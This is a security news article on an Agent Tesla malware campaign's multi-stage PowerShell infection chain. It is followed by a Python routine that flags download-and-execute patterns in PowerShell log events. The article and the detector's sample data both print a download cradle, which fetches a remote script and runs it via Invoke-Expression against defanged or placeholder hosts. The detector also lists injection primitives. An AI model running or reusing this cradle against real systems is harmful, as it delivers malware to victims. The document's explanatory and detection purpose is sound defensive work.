Agent Tesla Malware Employs Multi-Stage Attacks Using PowerShell Scripts

Security researchers have identified a sophisticated malware campaign utilizing Agent Tesla variants delivered through elaborate multi-stage attack sequences.

The malware operation, discovered in mid-April 2025, leverages PowerShell scripts as a critical component in its infection chain, demonstrating increased technical complexity compared to earlier variants.

Cybercriminals behind this campaign have implemented a methodical approach beginning with socially engineered emails carrying archive attachments.


These seemingly innocuous files contain obfuscated JavaScript that serves as the initial infection vector, designed to evade traditional detection mechanisms.

The attack sequence progressively unfolds through multiple stages, with each step hiding the true intent until the final payload execution.

Broadcom researchers noted that these Agent Tesla variants employ particularly sophisticated obfuscation techniques, making detection increasingly challenging for conventional security tools.

“The threat actors behind this campaign have demonstrated advanced capabilities in designing multi-stage attacks that can bypass many standard security measures,” explained the research team in their analysis.

Malware Campaign

The malware campaign poses significant risks to organizations across sectors, with the potential to harvest sensitive credentials, capture keystrokes, and exfiltrate confidential data.

The modular nature of the attack allows threat actors to adapt their techniques quickly when detection measures improve.

The infection sequence begins when users open the malicious attachment, triggering a hidden JavaScript file that initiates the attack chain.

The JavaScript executes and connects to command-and-control servers to download a PowerShell script, as shown in the execution sequence:

$client = New-Object System.Net.WebClient
$script = $client.DownloadString('hxxp://malicious-domain[.]com/payload.ps1')
Invoke-Expression $script

This PowerShell script serves as the delivery mechanism for the final Agent Tesla payload, which gets loaded directly into memory and injected into legitimate Windows processes to maintain persistence while evading detection.

The malware utilizes process hollowing techniques to replace the code of a legitimate process with its malicious code, allowing it to operate under the guise of trusted system processes.

Researchers have identified multiple protection mechanisms that can detect various stages of this attack, including behavior-based detection of suspicious PowerShell activities and network monitoring for unexpected connections to certificate authorities.

The emergence of these sophisticated Agent Tesla variants highlights the continuing evolution of malware delivery techniques.

Organizations should implement comprehensive security measures including email filtering, PowerShell logging, and advanced endpoint protection to mitigate these threats effectively.
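The download cradle shown above (a WebClient.DownloadString call fed straight into Invoke-Expression) is exactly the kind of pattern that PowerShell Script Block Logging exposes to defenders, which is why the article lists PowerShell logging among the mitigations. The following is an added example, not code from the article or from Broadcom's analysis: a small Python triage routine that scans the script text recorded in PowerShell Operational log events (Event ID 4104) for download-and-execute indicators and assigns a severity. The event samples are constructed for this example and the indicator lists, severity thresholds and function names are this example's own assumptions, not a published detection rule.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample Script Block Logging records (Event ID 4104 text), not
# real captured events. Tuple is (event_id, script block text).
SAMPLE_SCRIPT_BLOCKS: List[Tuple[str, str]] = [
    ("4104", "Get-ChildItem C:\\Users | Where-Object { $_.Name -like 'a*' }"),
    ("4104", "$client = New-Object System.Net.WebClient\n"
             "$script = $client.DownloadString('http://example.invalid/payload.ps1')\n"
             "Invoke-Expression $script"),
    ("4104", "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"),
    ("4104", "Invoke-WebRequest -Uri https://example.invalid/update.zip "
             "-OutFile C:\\temp\\update.zip"),
]

# Indicator families (assumed for this example). A download primitive alone is
# common in legitimate administration; combined with dynamic execution or
# in-memory loading it matches the cradle pattern described in the article.
CRADLE_INDICATORS = {
    "download_primitive": re.compile(
        r"(?i)(Net\.WebClient|DownloadString|DownloadData|DownloadFile|"
        r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|Start-BitsTransfer)"),
    "dynamic_execution": re.compile(
        r"(?i)(Invoke-Expression|\bIEX\b|\[ScriptBlock\]::Create|"
        r"Add-Type|Reflection\.Assembly)"),
    "memory_loading": re.compile(
        r"(?i)(VirtualAlloc|CreateThread|WriteProcessMemory|FromBase64String)"),
}


@dataclass
class Finding:
    event_id: str
    severity: str
    matched: List[str] = field(default_factory=list)
    excerpt: str = ""


def analyze_script_block(event_id: str, text: str) -> Optional[Finding]:
    """Classify one logged script block; return None if nothing of interest."""
    matched = [name for name, rx in CRADLE_INDICATORS.items() if rx.search(text)]
    if not matched:
        return None
    has_download = "download_primitive" in matched
    has_exec = "dynamic_execution" in matched or "memory_loading" in matched
    if has_download and has_exec:
        severity = "high"      # fetch-then-execute: the download cradle shape
    elif has_exec:
        severity = "medium"    # dynamic execution without an obvious fetch
    else:
        severity = "low"       # a download on its own; review in context
    # Keep only the first line, truncated, as a review excerpt.
    excerpt = text.splitlines()[0][:80] if text else ""
    return Finding(event_id=event_id, severity=severity, matched=matched, excerpt=excerpt)


def scan(blocks: List[Tuple[str, str]]) -> List[Finding]:
    """Run the classifier over a batch of (event_id, text) records."""
    results = []
    for event_id, text in blocks:
        finding = analyze_script_block(event_id, text)
        if finding is not None:
            results.append(finding)
    return results


if __name__ == "__main__":
    for f in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"[{f.severity.upper():6}] event={f.event_id} "
              f"indicators={','.join(f.matched)} :: {f.excerpt}")
```

Script Block Logging must be enabled (Turn on PowerShell Script Block Logging under the PowerShell administrative template) before the 4104 events exist to scan; the classifier above is deliberately pattern-based, so obfuscated variants that avoid these literal strings will not match it and should be caught by the behaviour-based endpoint controls the article also recommends.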


Tushar Subhra Dutta
Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.